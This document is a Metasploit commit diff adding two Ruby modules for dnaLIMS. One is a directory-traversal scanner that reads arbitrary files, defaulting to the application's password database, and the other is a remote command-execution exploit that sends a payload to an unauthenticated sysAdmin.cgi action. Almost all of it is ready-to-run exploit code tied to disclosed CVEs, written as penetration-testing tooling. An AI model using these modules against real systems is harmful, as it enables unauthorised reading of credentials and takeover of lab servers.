Land #8079, exploit and aux for dnaLims
commit
7bcd53d87d
|
@ -0,0 +1,81 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'DnaLIMS Directory Traversal',
|
||||
'Description' => %q{
|
||||
This module exploits a directory traversal vulnerability found in dnaLIMS.
|
||||
Due to the way the viewAppletFsa.cgi script handles the 'secID' parameter, it is possible
|
||||
to read a file outside the www directory.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2017-6527'],
|
||||
['US-CERT-VU', '929263'],
|
||||
['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'h00die <mike@shorebreaksecurity.com>', # Discovery, PoC
|
||||
'flakey_biscuit <nicholas@shorebreaksecurity.com>' # Discovery, PoC
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => "Mar 8 2017"
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/']),
|
||||
OptString.new('FILE', [ true, "The path to the file to view", '/home/dna/spool/.pfile']), # password db for app
|
||||
OptInt.new('DEPTH', [true, 'The traversal depth', 4])
|
||||
], self.class)
|
||||
|
||||
deregister_options('RHOST')
|
||||
end
|
||||
|
||||
|
||||
def run_host(ip)
|
||||
file = (datastore['FILE'][0,1] == '/') ? datastore['FILE'] : "#{datastore['FILE']}"
|
||||
traverse = "../" * datastore['DEPTH']
|
||||
uri = normalize_uri(target_uri.path)
|
||||
base = File.dirname("#{uri}/.")
|
||||
|
||||
print_status("Requesting: #{file} - #{rhost}")
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{base}/viewAppletFsa.cgi",
|
||||
'vars_get' => { 'secID' => "#{traverse}#{file}%00",
|
||||
'Action' => 'blast',
|
||||
'hidenav' => '1'
|
||||
}
|
||||
})
|
||||
|
||||
if not res
|
||||
print_error("No response from server.")
|
||||
return
|
||||
end
|
||||
|
||||
if res.code != 200
|
||||
print_error("Server returned a non-200 response (body will not be saved):")
|
||||
print_line(res.to_s)
|
||||
return
|
||||
end
|
||||
|
||||
vprint_good(res.body)
|
||||
p = store_loot('dnaLIMS.traversal.file', 'application/octet-stream', ip, res.body, File.basename(file))
|
||||
print_good("File saved as: #{p}")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
@ -0,0 +1,107 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'dnaLIMS Admin Module Command Execution',
|
||||
'Description' => %q{
|
||||
This module utilizes an administrative module which allows for
|
||||
command execution. This page is completely unprotected from any
|
||||
authentication when given a POST request.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'h00die <mike@shorebreaksecurity.com>', # Discovery, PoC
|
||||
'flakey_biscuit <nicholas@shorebreaksecurity.com>' # Discovery, PoC
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2017-6526'],
|
||||
['US-CERT-VU', '929263'],
|
||||
['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
|
||||
],
|
||||
'Platform' => %w( linux unix ),
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
'RequiredCmd' => 'perl' # software written in perl, and guaranteed to be there
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { }]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Mar 8 2017'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/'])
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, 'sysAdmin.cgi'),
|
||||
'method' => 'POST',
|
||||
'vars_post' => {
|
||||
'investigator' => '',
|
||||
'username' => '',
|
||||
'navUserName' => '',
|
||||
'Action' => 'executeCmd',
|
||||
'executeCmdData' => 'perl -V'
|
||||
}
|
||||
)
|
||||
if res && res.body
|
||||
if /Summary of/ =~ res.body
|
||||
Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
begin
|
||||
vprint_status('Sending Exploit')
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri.path, 'sysAdmin.cgi'),
|
||||
'method' => 'POST',
|
||||
'vars_post' => {
|
||||
'investigator' => '',
|
||||
'username' => '',
|
||||
'navUserName' => '',
|
||||
'Action' => 'executeCmd',
|
||||
'executeCmdData' => payload.encoded,
|
||||
}
|
||||
)
|
||||
vprint_good(res.body)
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
Loading…
Reference in New Issue